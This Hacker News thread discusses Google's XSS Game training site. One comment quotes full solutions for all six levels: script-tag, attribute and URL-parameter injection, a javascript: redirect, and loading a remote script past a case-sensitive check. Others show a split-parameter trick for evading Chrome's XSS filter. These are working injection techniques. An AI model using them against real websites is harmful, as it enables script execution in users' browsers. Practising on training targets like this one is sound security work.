
The XSS Game by Google - artf
https://xss-game.appspot.com/
======
throwaway729
Solutions: [http://pastebin.com/hv0h73eC](http://pastebin.com/hv0h73eC)

I'm posting because I find that whenever I can't solve some security puzzle,
it usually means I didn't foresee an attack and I've been writing insecure
code :( So hopefully people who get stumped can take a look at the solutions
and determine if that's the case for them.

It'd be cool if someone wrote up explanations for each of these w/ links to
relevant portions of Google's documentation.

~~~
randyrand
I know you posted on pastbin with 'never' for a reason. But incase they ever
shut down, here is the text:

    
    
      # lvl 1
      
      Enter `<script>alert('')</script>` into the search box.  
      
      # lvl 2
      
      Use the `onclick` attribute of the font tag (hint is from       the first post, which shows `<font>` might be allowed for the purpose of changing colors. Winning message:
      
          <font color="red" onclick="alert('')">blah</font>
      
      and then click blah after posting the message. (or use   onload etc.)
      
      # lvl 3
      
      Modify the URL parameter so that you inject code into the   `<img>` tag:
      
          https://xss-game.appspot.com/level3/frame#1.jpg'   onclick="alert('')" alt='a picture called 1
      
      which will render as:
      
         html += "<img src='/static/level3/cloud/1.jpg'    onclick="alert('')" alt='a picture called 1.jpg'/>";
      
      on line 17 of the HTML file. Now click on the picture.
      
      # lvl 4
      
      Use `3'); alert('` as the value for your timer.
      
      # lvl 5
      
      Notice that if you type `javascript:alert('')` into your browser location bar, an alert will pop up. So we'll use   this as the location that the user is sent to on the signup page. Go the the URL:
      
          https://xss-game.appspot.com/level5/frame/signup?  next=javascript:alert('')
      
      and then click the `Next` link.
      
      # lvl 6
      
      The regex only notices lowercase https. So upload this JS file to some URL http://mysite.com/xss.js:
      
          alert('');
    
      and then go the the url `https://xss-  game.appspot.com/level6/frame#Http://mysite.com/xss.js`
      
      # Notes
      
      In an actual attack you'd use onerror or onload everywhere instead of onclick.

~~~
dstjean
Level 6: You can exclude the protocol entirely (eg: "//news.ycombinator.com")

This will ensure the browser uses the "current protocol" as in if your website
is browseable from http all request //www...com will be http and if your page
is fetched using https, all resources starting with //www.hn.com will be
loaded using https

if your website was reachable from protocol xyz://mydomain.com, all resources
starting with // would be fetched using the xyz:// protocol

~~~
jtinder
or you can simply add a space after #

------
eridius
Why does a <script> tag not work in level 2? I can see it ending up in the
DOM.

Edit: Ah hah, HTML 5 spec explicitly says <script> tags inserted via innerHTML
do not execute ([https://www.w3.org/TR/2008/WD-
html5-20080610/dom.html#innerh...](https://www.w3.org/TR/2008/WD-
html5-20080610/dom.html#innerhtml0)).

~~~
cozuya
That probably explains why its also stripped from React's not-so-accurately
named "DangerouslySetInnerHTML" method..

------
xssfoofoo
Level 3 seems to no longer be exploitable. Firefox 45.5 here automatically
%-encodes the characters into the src attribute.

~~~
xssfoofoo
this app appears to be at least 2.5 years old.

~~~
flanbiscuit
previous hacker news discussion from 2014 about it:
[https://news.ycombinator.com/item?id=7815237](https://news.ycombinator.com/item?id=7815237)

------
jaimehrubiks
I'd like to see the game solutions, I'm new on this and can't pass lv 3.

~~~
Warp__
Firefox breaks lv 3. See my comment below if you'd like to get past that
stage.

------
giuscri
These challenges are very easy. Anyone who knows something harder? To my
knowledge, it's not easy to find material to study/exploit to get better at
XSS'ing.

~~~
fapjacks
OverTheWire [0] has been my personal favorite for many years. Some of them are
really challenging!

[http://overthewire.org/wargames/](http://overthewire.org/wargames/)

~~~
giuscri
Sure. But I was searching for something XSS specific

------
onion2k
I'm quite surprised that these exploits aren't blocked at the browser level by
default with developers having to write code to make the exploits work if they
need to.

For example, if browsers flatly refused to load code from an external URL
unless the address was whitelisted in the page's HTTP response headers then
you'd make level 6's exploit impossible without much of an impact on web
development.

The CORS header Access-Control-Allow-Origin can be used to force a browser to
work that way, but only if a site sets it. I'm suggesting we're at the point
now where browsers should be secure by default, even if it breaks some old
sites.

~~~
fastest963
If you look at the source, they're actually disabling the XSS protections in
the browser:

# Disable the reflected XSS filter for demonstration purposes

self.response.headers.add_header("X-XSS-Protection", "0")

~~~
dylanfw
Chrome's XSS filter can still be circumvented in quite a few instances. The
easiest way I've seen is when the attacker controls at least two variables and
can split the XSS across them in such a way that neither half appears
malicious but when loaded into the page they create a malicious script.

Example: ?a=<script>void('&b=');alert('XSS')</script>

The value of a is <script>void(' and the value of b is
');alert('XSS')</script>.

------
partizanos
Did someone get why they prompt us to go to
[https://tools.ietf.org/html/draft-hoehrmann-javascript-
schem...](https://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00) ?
I didnt get it.

The mechanism next=javascript:alert('') with the column how is it called? Are
there exape of using anything other than javascript before column? it was a
very great tutorial:)

------
i336_
Got to the first one.

Okay, URL injection, that's easy: <script>alert('hi');</script>

Or not: that didn't work.

I had to remove the semicolon for it to notice my code. At that point I
immediately closed the tab.

~~~
yathern
Do you... realize it's actually a live webpage your testing on? It's not like
the server checks to see if you wrote exactly the right answer. It just checks
to see if an alert is fired. If it didn't work, it's because you didn't do it
right.

<script>alert()</script> most certainly works unless you have noscript.

~~~
i336_
Yes, but if you try

    
    
      https://xss-game.appspot.com/level1/frame?query=<script>alert('hi');</script>
    

it doesn't work.

    
    
      https://xss-game.appspot.com/level1/frame?query=<script>alert('hi')</script>
    

without the semicolon does.

I realize it's JS, but I can see it's just dumbly parsing what I've typed as
opposed to eg overloading alert() (which can be done:
[http://stackoverflow.com/questions/1729501/javascript-
overri...](http://stackoverflow.com/questions/1729501/javascript-overriding-
alert)) and demonstrating/using best practices in the source code to prevent
the JS I type from actually damaging the demo itself.

For something that's _really_ interesting, search Pinterest for "reactjs", and
see if you get the "Hack Pinterest" tile as your first result. _That_ was fun
to play with!

~~~
CGamesPlay
Open your web inspector, set the console target to the iframe, and type
"alert". Notice that the alert function is overridden.

Set your URL to [https://xss-
game.appspot.com/level1/frame?query=a;b](https://xss-
game.appspot.com/level1/frame?query=a;b). Notice that the ";b" is removed from
the results page.

Challenge your initial assumption about the checker being stupidly naive.
Notice XSS bugs in your own code afterwards.

~~~
i336_
Thanks. I'll admit this is a field I'm completely unfamiliar with. (I was
actually considering bug bounty hunting in the future, thanks for the wake up
call.)

I actually noticed the ; was being removed and am very confused as to why, but
forgot to mention that in my earlier comment.

~~~
CGamesPlay
Full disclosure: I didn't bother to learn about why the ; is being split. But
I can hasten a guess: the python web server treats that as a parameter
separator.

... and confirmed.

[1]
[https://www.google.com/webhp?q=webapp.WSGIApplication+semico...](https://www.google.com/webhp?q=webapp.WSGIApplication+semicolon)
[2] [https://groups.google.com/forum/#!topic/google-
appengine/Aai...](https://groups.google.com/forum/#!topic/google-
appengine/Aai8ShndteA) [3] [https://www.w3.org/TR/REC-
html40/appendix/notes.html#h-B.2.2](https://www.w3.org/TR/REC-
html40/appendix/notes.html#h-B.2.2)

~~~
i336_
Ah, I see. That makes perfect sense, thanks for explaining it :)

------
fgandiya
Hey, I just used this a few weeks ago as I was doing this course on web app
security by Troy Hunt[0]

I didn't get far with it because it turns out that some browsers prevent the
exploit, like Firefox and Safari.

[0][https://www.pluralsight.com/courses/hack-yourself-
first?gcli...](https://www.pluralsight.com/courses/hack-yourself-
first?gclid=CjwKEAiAmdXBBRD0hZCVkYHTl20SJACWsZj9cTLBFQsqJzN1Y1EwTHW_yGErNY-
nkQLG8Q4mipLf8BoC7djw_wcB)

------
Kenji
_There will be cake at the end of the test._

The cake is a lie.

~~~
rainboiboi
There you go...

    
    
                                                             -oooo:-                                                        
                                                            omhsoosho`                                                      
                                                            Ndo:``:oh-                                                      
                                                            dms+--+ym:                                                      
                                                            -ymhohdh+`                                                      
                                                             `N/`.s.                                                        
                                                              +:  +                                                         
                                                              --  :                                                         
                                                              --  o                                                         
                                                              ..  +                                                         
                                                              ::  s        ..`                                              
                                                    .:sssso.  --  +     :syhhyo`                                            
                                    ..::::.       `odhhyyhdd. ::  s    .mhhyhhdh.       -:...`                              
                                   /dhhhhhhs     .odddhyhdddh+y:  my-syhdhhyhhddy/`   .odhyyhh:                             
                                  yNdhyyoyhmo+::+ms/+++//++/odm:  NNmNd+///+++/+ody::omhyssyhdm-                            
                                -sddyyyyyyyoommmmmmdhyyyyyyhddd: `ddmdmdhyssyyhhmmNNNNdhyyyyyhmo-`                          
                            ``-omdyyyssys///shdddddddddmmdddhyy-``yhddddhhhhhdmmmmmmdd/oyssyyyyhmhss-`                      
                         `:ohhdmddhhyyyyyshddddhhyyyyyhddhhyo:-...--shhyysssyyhhdhhhddyyysyyyhdddmNNmyo.                    
                        /hNNmmd/:o+/////:`/osyhhyyys+syyhhyysysooossyyyyyooyyyyyyysyy+./oooooos/:ydNNmNmo.                  
                       +dNmmmmmhoo+///////oossshhyyyyyyyyssoossoosoosssyyyyyyyhsoyyyys/:-..--:/+sdddmmmNMy                  
                      `hNmmdmmdmddddhhhyhysso+.oyssssso-./o:-/+oo++oo--osoooooo..oyyhyyyyyyhhhyhdddmmdmNNN                  
                      `yNmNNhhdmdddhhhyyyyyyys:-......`./+++/:o++oo++/-````..::/+sysysyyyhsshhhydddmmmNNNN                  
                       sMNNNNNNmmdmdhhhhyyyyyyhhssssoo+oo/+//:/+//+:++++ooosyooyssosyyhhyhsshdhdmmNmNmmMMN                  
                       -NNNNNNhmNmdmmmdddddmhhhyyyyssys///+/:://////o+osoo+osoossosyhhdddh+omddmNNmmNmNMMN                  
                       oMNNNNNNNNdydNmmmmmdhydhhsoooodhydhsshys+soyooooosssyhyhymdhdhyddmmmdmNNNNNNmNNNMMM                  
                       yMMNNNMmmNdmmNNNNNNmh/sysyysyhyddmhhyhyhhddyyyhmddhhdmdddmmmdmmmmNNmmmNmNNNNmMNMMMM                  
                      .dMMNNMMNNNmNNNNNNmmNNhsddddNNdmhdmddyyhdhdhdddhdmhhdddhmddmmmNNNNNNNNNNNNNNNNMNMMMM                  
                      :NMMMNMMNMNhhmNNNNmdmNNmhddmdNmmmmmmddddNmdhdhddddmddmmmmmmNdNmdmmNNNmNNNNNdmMMMMMMM                  
                      -mMMMMMNNmNNmNNNNNNNNNNNdmmNmNmNmNmmNNmmNNdhddmmmmNmhhhyohNMNMNmmmmNdmNNMMMNNMMMMMMM                  
                      .dMMMMMMNNNMMMMMNNNNNMNmmmNNNmmmmNNdddmmNNNmmdNNmNNNmmNNNNNNNNNNNNNNNmNNNNNmNMMMMMMM                  
                      :NMMMMMMMMMMMMMMMNmmNMNNNNNNNmmNmNNNNmdmNNNNNNNmNNdmNNMMNMmNNNNNNMMNdmNNNMNmmMMMMMMM                  
                      :NNMMMMMMMMMMMMMMMMNNMNNMNNNMMMNNNNNNmNmdmmmNNNNNNmmNNNNNNNNNNMNNMMMNNNNMMNmMMMMNNMN                  
                      :NMMMNNMMMMMMMMMMMMMNNMMMMNMMMNmNNMNNNNNmhNMNNMNNNMMNMMMMMNNMMNNNMNMMMMNMMNNMMNMNMMM                  
                      `hMMMNdMNNMNNNNNMMNNNNMMMMMMMMNmNMMMMNNNNNNNdmmmMNMMMMMMNNMMNmdNMMNMNNNNMNmmNMNMMMMN                  
                       yMMMMNMMNMNmmNNNMNmddmMMNNNMNNNNNMMNNNNMNNNNNNNmNNNNNNNNNNNNNddNdmdmmNNMNNdMMMMMMMN                  
                       yMMMMNMNMMNNMMNNNNmdmmNMNNdhmMNNNNNNmNMMddddmNNNmNNMMNmNmmmmmNNmmmmNMMMMMMNNNMMMMMN                  
                       yNNNMMNNMMMMMMNNNNNMmmdNNNNNNNNNNNNmNNNNNmNmmNNNNNNNNNNNmNmNNNNNNNNNNNNNMMMNNMMMMMy                  
                       +MMMMMMMMMMMNNNNMMMNNNNmNNNMNMNNMNNmhdNNNNNmNNNmmNNNNNNNNNNNMMNNmNNNNNMNMNMMMMMMMN:                  
                        NMMMMNMMMMMMMNNNNNNdNMNNNNNNmNNNNNNNNNmmhNNNNmdNNNNNNNNNMMNNMNNNNNNNNNMMMMNNMMMNs`                  
                        -sdmNMNNMMMMMNNNNmmmmNNNMNmNMNNNNNNNMNmNNNNNNmmmdmNNNMNmmmmNMNNMNMmmNNMMMNMNmd+-`                   
                          `.ohNNMMNMMNMNNmdmNNNNNNmNMNNMNNNNmNNNmmmNmNMMNNMNNMMNNNNNNNNNNMMMMMMMNNho.`                      
                              :+hdNNNNNNNNNNNNNNmNNNNNNNMNNNmNNNNmMmmmNNNMNNNNNNNNMNNMMMMMNNmdds/-                          
                                 `--:+shddmmNmmmmNNNNMNNNMNNNNNNNNNNMMNMMMNNNmNNNMNNNNdh++/-.`                              
                                         `--++osdddddddysNmmhshmmmmmNmddddddho/:++/---                                      
                                                        `-.-. .------.                                 
    
        
    

You have successfully completed the game!

~~~
Kenji
Ceci n'est pas une pipe.

~~~
freecodyx
c'est quoi alors ?

~~~
Fluid_Mechanics
notre fin

    
    
                                          ---/++:/oɥppppppɯuɯɯɯɯɯɥsɥɯɯusʎpppppppso++--`                                     
                                  `˙-/++ɥpuuuuɯuuuɯuuuɯɯɯuɯɯuuuuuuuuuuɯuuuɯuuuuɯɯɯɯuɯɯppɥs+:--`                             
                              -/sppɯuuɯɯɯɯɯuuɯuuuuuuuuɯuuuɯɯɯɯɯuuuuɯuuuɯuuuuuuuɯuuuuuuuuuuuuuupɥ+:                          
                          `˙oɥuuɯɯɯɯɯɯɯuuuuuuuuuuɯɯuuɯuuɯɯuɯuɯɯɯuuuɯuuuuɯuuɯuɯuuuuuuɯpɯuuɯuɯɯuɯɯuuɥo˙`                      
                       `-+pɯuɯuɯɯɯuuɯɯɯuɯuuɯuɯɯɯɯuɯuuuɯpɯɯɯuuuuuuɯuɯuuuuuuuɯuɯuɯuuuɯɯɯɯuuuuɯɯɯɯɯuuɯuɯps-                    
                      `suɯɯɯuuɯɯɯɯuuuuuuuuuɯuuɯɯuuuuuuuuupɯuuuuɥɯɯuuuuuuuuuɯuuuuuuɯupuuuuuuɯɯɯɯɯɯɯuɯɯɯɯu                    
                      :uɯɯɯɯɯɯɯuɯuɯuuuuuɯuuɯɯuuuuuuuuuuuɯɯuuuɯuuuuupɥɯuuɯuuɯuɯuuuɯuuuuɯɯɯuuuuɯɯɯɯɯɯɯɯɯɯɯ+                   
                      ʎɯɯɯɯɯuuɯɯɯuuuuuuuuuuuuuɯuɯuuuuuuuuuuuɯɯuɯuuuuuɯuuuuuuuuuuuupɯɯɯuuuuuɯɯɯɯɯɯuuɯɯuuuʎ                   
                      uɯɯɯɯɯuuuɯɯɯɯɯɯuɯɯɯɯuuɯɯɯɯɯuɯuɯɯuuɯuuuɯppppɯɯuɯuuuuuuɯɯɥpuuɯuɯɯpɯuuuuɯɯuuɯɯuɯuɯɯɯɯʎ                   
                      uɯɯɯɯɯɯɯpuuɯuuɯɯpɯpuppuuuuuuuuuuuuuɯuuuuuuuɯuuuuɯɯuuuuuɯuuuɯɯɯppɯuɯuuuɯɯuɯuɯɯuɯɯɯɯʎ                   
                      uɯɯɯɯuɯuɯɯuɯuuuuɯuɯɯupɯuɯɯuuɯɯɯɯɯɯuɯɯɯɯpuuuuuuuɯɯɯɯuɯuɯɯɯɯɯɯɯɯuuuuɯɯuuuuuɯuuɯpuɯɯɯɥ`                  
                      ɯɯɯuɯuɯɯuuɯɯuɯɯɯɯuɯuuuɯɯuuɯɯɯɯɯuɯɯuuuɯuuɯuɥɯuuuuuɯuuɯuɯɯɯuɯɯɯɯuuɯɯɯɯɯɯɯɯɯɯɯɯɯuuɯɯɯu:                  
                      uɯuuɯɯɯɯɯuɯɯuuuuɯɯɯuuɯuuuuuuuuuuɯɯuuuuuuɯɯɯpɯuɯuuuuuuɯɯɯuuuɯuuɯuuɯɯɯɯɯɯɯɯɯɯɯɯɯɯɯɯuu:                  
                      ɯɯɯɯɯɯɯɯɯuɯuuuɯpuɯɯuuuuuuɯɯuɯɯuuɯpuuɯuuuuuuuɯpɯuuuuɯuɯɯuuuuuuuɯuɯɯuɯɯɯɯɯɯɯɯɯɯɯɯɯɯɯu:                  
                      ɯɯɯɯɯɯɯuɯuuuuuɯuuuuuuuuuuuuuuuɯɯuuuɯuupɯɯuuuɯɯpppuuɯɯɯɯuuuɯɯɯuɯuuuuuɯɯɯɯɯuuuɯɯɯɯɯɯp˙                  
                      ɯɯɯɯɯɯɯuuɯɯɯuuɯpuɯɯɯɯuɯuɯuɥoʎɥɥɥɯuɯɯɯɯppɥpuuɯɯuuɯɯuɯuɯuɯuɯɯpuuuuuuuuuuuɯuuɯuuɯɯɯɯɯɯ-                  
                      ɯɯɯɯɯɯɯɯpuuuuuɯuuuɯɯpɯupuɯɯɯɯɯɯppɯppppɥpɥpɯuppppɯɯɯɯɯɯupɯppɥɯuuɯpɯuuuuɯɥɥuɯuɯɯuɯɯɯu:                  
                      ɯɯɯɯuɯuuuuuuuuuuuuuuuuɯɯɯppɯɥpppɥɥɯpɥpppɥpɥpɥʎʎppɯpɥɯpuuppppsɥuuɯɯuuuuuuɯuuuɯɯuuɯɯp˙                  
                      ɯɯɯɯuɯɯuuuuɯuɯɯɯuuɯɯɯɯpɯɯɯpppɯpɥɥppɯɥʎʎʎppɥɥʎɥʎɥɥɯppʎɥʎsʎʎsʎs/ɥɯuuuuuuɯɯpuɯɯɯuuuɯɯʎ                   
                      ɯɯɯuuuɯuuuuuuɯpɯɯɯppʎɥpɥpɯʎɥʎɥʎsssoooooʎos+sʎɥssɥpʎɥpoooosɥɥpʎɥpɯɯɯɯɯupʎpuuuuuuuuɯo                   
                      uɯɯuɯuɯɯuuɯppɯo+ɥpppɥɥʎsossooso+ooso+o//////::/+///sʎssʎʎʎʎɥɥɥɯpppppɯɯɯpɯuɯɥuuuuuu-                   
                      uɯɯɯɯuɯuɯɯpɥpɥssɥʎɥɥʎʎsossʎooʎsooo++++:+//+/://+/oo+oossssɥɥʎʎʎʎʎʎɥɥɥɥpɯpɯɯuuuuuuɯs                   
                      uuuuɯɯɯpppʎɥɥɥssɥʎʎʎsʎsʎs+/::˙˙````-/++oo++o:/+++/˙`˙˙˙˙˙˙-:sʎʎʎʎʎʎʎɥɥɥpppɯpɥɥuuɯuʎ`                  
                      uuuɯpɯɯpppɥʎɥɥɥʎʎʎʎʎʎɥʎʎo˙˙ooooooso--oo++oo+/-:o/˙-osssssʎo˙+ossʎɥʎɥɥɥppppɯpɯɯpɯɯuɥ`                  
                      ʎɯuɯɯɯppps+/:--˙˙-:/sʎʎʎʎosɥʎʎʎʎʎʎʎsssoosoossoossʎʎʎʎʎʎʎʎɥɥsssoo///////+ooɥɯɯɯɯɯup+                   
                      ˙oɯuɯuupʎ:/soooooo/˙+ʎʎsʎʎʎʎʎʎʎooʎʎʎʎʎssooosʎsʎʎɥɥʎʎs+sʎʎʎɥɥʎso/`://///+o:/pɯɯuuɥ/                    
                        ˙oʎɯuuɯpppɥʎʎʎsʎʎʎppɥɥɥpɥɥʎʎsssʎʎɥɥs--˙˙˙-:oʎɥɥppɥʎʎʎʎʎɥɥppppɥsʎʎʎʎʎɥɥppɯpɥɥo:`                     
                          `-ssɥɯɥʎʎʎʎssʎo/ppɯɯɯɯɯɯpɥɥɥɥɥppppɥʎ``-ʎʎɥpppɯɯpppppppppɥs///sʎssʎʎʎpɯo-``                        
                              `-oɯɥʎʎʎʎʎɥpuuuuɯɯɥɥʎʎssʎɥpɯpɯpp` :pppɥʎʎʎʎʎʎɥpɯɯɯɯɯɯooʎʎʎʎʎʎʎpps-                            
                                -ɯpɥʎssʎɥɯo::ʎpo+/+++///+puɯuu  :ɯpo/++//+++/sɯ+::+oɯɥʎoʎʎɥpuʎ                              
                                 :ɥɥʎʎɥpo˙   `/ʎppɥɥʎɥɥpɥʎs-ʎɯ  :ʎ+ɥpppɥʎɥpppo˙     sɥɥɥɥɥɥp/                               
                                  `˙˙˙:-       ˙ɥpɥɥʎɥɥɯ˙    s  :: ˙ppɥʎʎɥɥpo`       ˙::::˙˙                                
                                                `oʎɥɥʎs:     +  --  ˙ossss:˙                                                
                                                  `˙˙        s  ::                                                          
                                                             +  ˙˙                                                          
                                                             o  --                                                          
                                                             :  --                                                          
                                                             +  :+                                                          
                                                            ˙s˙`/u`                                                         
                                                          `+ɥpɥoɥɯʎ-                                                        
                                                          :ɯʎ+--+sɯp                                                        
                                                          -ɥo:``:opu                                                        
                                                          `oɥsoosɥɯo                                                        
                                                            -:oooo-

~~~
freecodyx
Pas mal, j'imagine que tu as fait un script pour renverser le truc..

------
prezjordan
I made it past level 2 but I am curious why the second hint is true. Can
anyone provide some insights?

~~~
anowlcalledjosh
I think it's because the <script> tag gets inserted after the page loads,
which browsers won't execute automatically.

------
bl0bgate4
this is similar to
[https://www.codebashing.com/sql_demo](https://www.codebashing.com/sql_demo)

------
samfisher83
Some of these exploits won't work on firefox or I am not sure how to do it.
For example I can't get firefox to execute code on images.

~~~
eyeareque
You can try turning off JavaScript Xss filtering in Firefox, via about:config
--> browser.urlbar.filter.javascript

~~~
samfisher83
Thanks, I spend an way too much time with that. In case any one is using
firefox make sure to turn this stuff off.

BTW why doesn't chrome also filter this. I can't think of a good reason why
there is a legit reason to do some of this stuff.

------
splitdisk
I'll always love stuff like this, such a fun way to practice without the
pressure of finding something to report on.

------
freecodyx
I just call alert('dada') from the console, and it tells me congratulation the
site is buggy as well

~~~
Buge
The victim of your XSS attack will not use the console, so when creating a XSS
attack it shouldn't require the use of the console to activate it.

I can break any website for myself by putting stuff in the console.

------
EJTH
It was fun the few minutes it lasted. :)

------
Keloo
on level 4 try: [https://xss-
game.appspot.com/level4/frame?timer=%99](https://xss-
game.appspot.com/level4/frame?timer=%99) and you get: 500 internal server
error LOL

------
elcapitan
That was fun, but a bit too easy ;)

------
jamesmp98
Well that was fun

------
jkulak
I don't know, not being able to pass lvl1 with "<script>alert();" made me not
want to continue...

~~~
throwaway729
Because you end up with:

    
    
        Sorry, no results were found for <b><script>alert();</b>.
    

which is a syntax error. You need the closing </script>.

